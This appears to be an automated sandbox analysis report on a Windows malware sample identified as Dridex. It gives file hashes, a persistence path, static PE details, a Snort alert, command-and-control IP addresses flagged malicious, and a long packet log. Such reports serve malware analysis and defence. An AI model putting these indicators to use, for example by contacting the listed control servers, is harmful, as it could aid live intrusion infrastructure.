SHA-512:F09619949C5059160BCA61D7D53824BDE2F4CBACCCD402CDA6EB1EDD24B35E1C22B3A3419567471174496F6E6C4FB08D87630D414A8BB932225B3E86F60FF10C
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
Process:C:\Users\user\Desktop\ucD6u0vstJ.exe
File Type:PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Size (bytes):233984
Entropy (8bit):7.943766395072443
Encrypted:false
MD5:DE1CE3514F777178D672EE79AC398A74
SHA1:3DEDD7A2A55D337ABB4FAB69005794B1F4F8E775
SHA-256:C6BAA54DB42806216932280FCCA4F07E8323792D38199A966931EE713D387893
SHA-512:5B14F51EF96946741895EF047E1CF4506C8A0DA81EFACD90AD609BD40C2CBA82AE089B75FF754538C7239934D1961E82AD72CF10647BE660C25FD86A3A246A74
Malicious:true
Reputation:low
C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe:Zone.Identifier
Process:C:\Users\user\Desktop\ucD6u0vstJ.exe
File Type:ASCII text, with CRLF line terminators
Size (bytes):26
Entropy (8bit):3.9500637564362093
Encrypted:false
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true
Reputation:low
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Process:C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
File Type:Microsoft Cabinet archive data, 53830 bytes, 1 file
Size (bytes):161490
Entropy (8bit):7.9957473858448225
Encrypted:true
MD5:ADF8E835A8F04B4E6DC6BA0E24DADE1E
SHA1:51DDFE409EBA9C1FD54748A64879059AFBEE458A
SHA-256:A6E248E3CDAA2C2ED82E1EBAD211DEC4EC90F420E6EDE58EF12AF42F85CBE1F0
SHA-512:AA3023D5ECD76E7102A8064B6F8AE094EABEBA9E1107F97936158AFB0DCBEEE01C19A7825AD862EFCE353BDDF707FBF6BB6F56C700247A5B4A3529F6683DD231
Malicious:false
Reputation:low
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Process:C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
File Type:data
Size (bytes):984
Entropy (8bit):3.144769887788158
Encrypted:false
MD5:E16272EE9EE40388F4EA7D3295250E06
SHA1:A29C0B13CF44AA689AF07264453696212DC3DCBE
SHA-256:2ADD821C5E5B50BE0816E093EBC1719C7F032C2891653DA54EBB48D88F1259FF
SHA-512:1FBB1F3AEF16AABCC00EA47C1917F9E9D049F03CFBD8FD595119A0225866D3FC237F090C18D47A500D7501E03FA98A484A168D84DB2A224C2B3A8667A4D15727
Malicious:false
Reputation:low
\samr
Process:C:\Windows\System32\svchost.exe
File Type:GLS_BINARY_LSB_FIRST
Size (bytes):516
Entropy (8bit):4.022389674026674
Encrypted:false
MD5:2909D5802A91906E8F58475ECF7ABEBC
SHA1:419AFEAA8AA9E210DD81A093B6E154E84D144FCB
SHA-256:8055BC80FAED2F16FA793ABAE4A3225B0DFE9F43E37DC39AFCC7C65269613A67
SHA-512:0219239D75C581CBE267358D92D28689DCD26DF3A1F7F8D1238F48B127815430B8F1E797237C6F4BF23EA14A3EAAF9781EE0866323AE4034C151E9DE296E5EC1
Malicious:false
Reputation:low

Contacted Domains/Contacted IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
checkip.amazonaws.com | 54.84.34.26 | true | false | | high

Contacted URLs

Name | Process
http://checkip.amazonaws.com/ | C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe

Contacted IPs

Public

IP | Country | ASN | ASN Name | Malicious
54.84.34.26 | United States | 14618 | AMAZON-AES-AmazoncomIncUS | false
94.250.254.22 | Netherlands | 29182 | ISPSYSTEM-ASISPsystemAutonomousSystemLU | true
185.42.192.194 | Iraq | 62223 | TIME-NETIQ | true
78.155.199.51 | Russian Federation | 197068 | QRATORRU | true

Private

IP
192.168.1.13

Static File Info

General

File type:PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Entropy (8bit):7.943766395072443
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:ucD6u0vstJ.exe
File size:233984
MD5:de1ce3514f777178d672ee79ac398a74
SHA1:3dedd7a2a55d337abb4fab69005794b1f4f8e775
SHA256:c6baa54db42806216932280fcca4f07e8323792d38199a966931ee713d387893
SHA512:5b14f51ef96946741895ef047e1cf4506c8a0da81efacd90ad609bd40c2cba82ae089b75ff754538c7239934d1961e82ad72cf10647be660c25fd86a3a246a74
File Content Preview:MZ......................@...................................h...........!..L.!This is a PE executable..$PE..L...z..[..........................................@................................................................................................

Static PE Info

General

Entrypoint:0x401000
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:
Time Stamp:0x5B14E57A [Mon Jun 4 07:08:42 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:

Entrypoint Preview

Instruction

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3a000 | 0x1d8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x38cc1 | 0x38e00 | False | 0.988255494505 | data | 7.94542714575 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x3a000 | 0x1d8 | 0x200 | False | 0.546875 | data | 4.87264470546 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_MANIFEST | 0x3a058 | 0x17d | XML document text | English | United States

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
06/05/18-11:06:32.694099 | TCP | 2021013 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex CnC) | 447 | 49192 | 94.250.254.22 | 192.168.1.16

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 5, 2018 11:07:13.990628958 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.990817070 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.990910053 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.990932941 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.991393089 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.991952896 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.991982937 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.991995096 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.992125034 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.992141008 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.992151976 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.992165089 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.992177963 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.992257118 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.992311001 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.992331982 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.992347956 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.993338108 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.993341923 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.993374109 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.993904114 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:13.998387098 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.998404026 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.998409986 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:13.998646021 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.001301050 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.001331091 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.001342058 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.001460075 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.006302118 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.006331921 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.006345987 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.006362915 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.006386995 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.006489038 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.006511927 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.006542921 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.006588936 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.008945942 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.008963108 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.009114027 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.009154081 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.014741898 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.017601967 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.017621994 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.017627954 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.017859936 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.022759914 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.022777081 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.022782087 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.022789955 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.022795916 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.022903919 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.022914886 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.023040056 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.023072004 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.023607016 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.023639917 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.023780107 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.023822069 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.025679111 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.025711060 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.025950909 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.025991917 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.030142069 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.030175924 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.030383110 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.030426025 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.032963991 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.032989025 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.033214092 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.033257961 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042125940 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042171001 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042191982 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042205095 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042228937 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042402983 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042402029 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.042424917 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042458057 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042665005 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042686939 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042840958 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042855024 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.042859077 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042884111 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042901993 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042917013 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.042953014 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.043147087 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.043162107 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.043167114 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.043286085 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.043334961 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.043355942 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.043370008 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.043390036 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.043401957 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.043409109 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.043415070 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.044747114 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.044795036 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.045001030 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.045048952 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.047092915 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.054428101 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.054466963 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.054485083 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.054498911 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.054524899 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.054651022 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.054670095 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.054709911 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.054759026 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.055197001 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.055639982 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.055676937 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.055689096 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.055819035 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.055839062 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.055876970 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.055913925 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.056519985 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.057193041 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.057235956 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.057457924 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.065994978 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.066035986 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.066046953 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.066068888 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.066083908 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.066289902 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.066346884 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.068799973 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.068846941 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.069077969 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.069138050 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.078599930 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.078633070 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.078649998 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.078655958 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.078784943 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.078797102 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.078813076 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.078932047 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.079004049 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.079973936 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.079999924 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080100060 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080101967 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.080121040 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080144882 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080173016 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080192089 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080208063 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080378056 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080502987 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080519915 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080545902 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.080593109 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080600023 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080604076 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080677986 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080686092 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080698013 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.080791950 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.080810070 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.081120968 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.081163883 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.081310034 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.081872940 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.082019091 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.082045078 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.089862108 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.089885950 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.089905024 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.089912891 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.089972973 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.089993000 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.090015888 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.090065956 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.090105057 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.090503931 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.091947079 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.091965914 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.091974974 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.092058897 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.092063904 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.092072964 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.092080116 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.092097998 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.092135906 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.092140913 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.092607021 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.092627048 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.092664957 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.092978001 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.093004942 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.103137016 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.103167057 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.103176117 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.103184938 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.103262901 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.103281975 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.103298903 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.103338957 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.103378057 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.103739023 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.104938984 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.104969978 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.104984045 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.105076075 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.105108976 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.105179071 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.105207920 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.105226040 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.105242968 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.105359077 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.105372906 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.105382919 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.105479002 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.105513096 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.105643988 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.105981112 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.106013060 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.106164932 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.106199026 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.114454031 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.114497900 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.114514112 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.114533901 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.114641905 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.114669085 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.114689112 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.114717007 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.115080118 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.115099907 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.116595984 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.116631985 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.116791964 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.116821051 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.116833925 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.116841078 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.116846085 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.116919994 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.117023945 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.117048025 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.117058992 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.117065907 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.117222071 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.117244959 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.117470980 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.117491961 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.120273113 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.120316029 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.120374918 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.120395899 MESZ4474919294.250.254.22192.168.1.16
